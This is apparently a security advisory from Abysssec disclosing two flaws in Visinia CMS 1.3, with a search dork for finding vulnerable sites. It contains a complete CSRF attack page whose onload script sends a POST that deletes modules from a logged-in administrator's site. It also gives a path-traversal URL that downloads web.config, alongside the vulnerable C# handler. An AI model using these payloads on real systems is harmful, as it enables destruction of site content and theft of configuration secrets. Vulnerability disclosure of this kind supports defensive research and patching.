'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <  Day 3 (0day)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
 
'''
 
Abysssec Inc Public Advisory
  
  
  Title            :  Visinia Multiple Vulnerabilities
  Affected Version :  Visinia 1.3
  Discovery        :  www.abysssec.com
  Vendor           :  http://www.visinia.com/
  Download Links   :  http://visinia.codeplex.com/releases
  Dork             :  "Powered by visinia"
               
  Admin Page       :  http://Example.com/Login.aspx
  
Description :
===========================================================================================     
  This version of Visinia have Multiple Valnerabilities :
 
        1- CSRF for Remove Modules
    2- LFI for download web.config or any file
 
 
 
CSRF for Remove Modules:
===========================================================================================    
 
  With this vulnerability you can navigate the admin to visit malicious  site (when he is already logged in)
  to remove a Module with a POST request to server.
 
  In this path the Module will be removed:
         http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159  
 
  for removing other modules you need to just change ModuleId.
  
  
  The Source of HTML Page (Malicious  script) is here:
  ----------------------------------------------------------------------------------------
<html>
<head>
<title >Wellcome to My Site!</title>
Hello!
...
...
...
This page remove Modules in Visinia CMS.
 
<script>         
        function RemoveModule() {           
            try {
                netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
            } catch (e) {}
 
            var http = false;
            if (window.XMLHttpRequest) {
                http = new XMLHttpRequest();
            }
            else if (window.ActiveXObject) {
                http = new ActiveXObject("Microsoft.XMLHTTP");               
            }
 
            url = "http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159";
            http.onreadystatechange = done;
            http.open('POST', url, true);
            http.send(null);
        }
        function done() {
            if (http.readyState == 4 && http.status == 200)
            {              
            }
        }    
</script>
</head>
<body onload ="RemoveModule();">
</body>
</html>
 
  ----------------------------------------------------------------------------------------
 
 
File Disclosure Vulnerability:
===========================================================================================    
 
  using this path you can download web.config file from server.
         http://Example.com/image.axd?picture=viNews/../../web.config
   
  The downloaded file is image.axd, while after downloading you find that the content of
  image.axd is web.config.
 
  Vulnerable Code is in this DLL    : visinia.SmartEngine.dll
  and this Method : ProcessRequest(HttpContext context)
 
  --------------------------------------------------------------------
   public void ProcessRequest(HttpContext context)
   {
    if (!string.IsNullOrEmpty(context.Request.QueryString["picture"]))
    {
        string fileName = context.Request.QueryString["picture"];     // Give the file from URL
        string folder = WebRoots.GetResourcesRoot();
        try
        {
            FileInfo fi = new FileInfo(context.Server.MapPath(folder) + fileName);
            int index = fileName.LastIndexOf(".") + 1;
            string extension = fileName.Substring(index).ToLower();
            if (string.Compare(extension, "jpg") == 0)
            {
                context.Response.ContentType = "image/jpeg";
            }
            else
            {
                context.Response.ContentType = "image/" + extension;
            }
            context.Response.TransmitFile(fi.FullName);              // Put the file in 'Response' for downloading without any check
        }
        catch
        {
        }
    }
   }
 
 
 
===========================================================================================
  
feel free to contact me : shahin [at] abysssec.com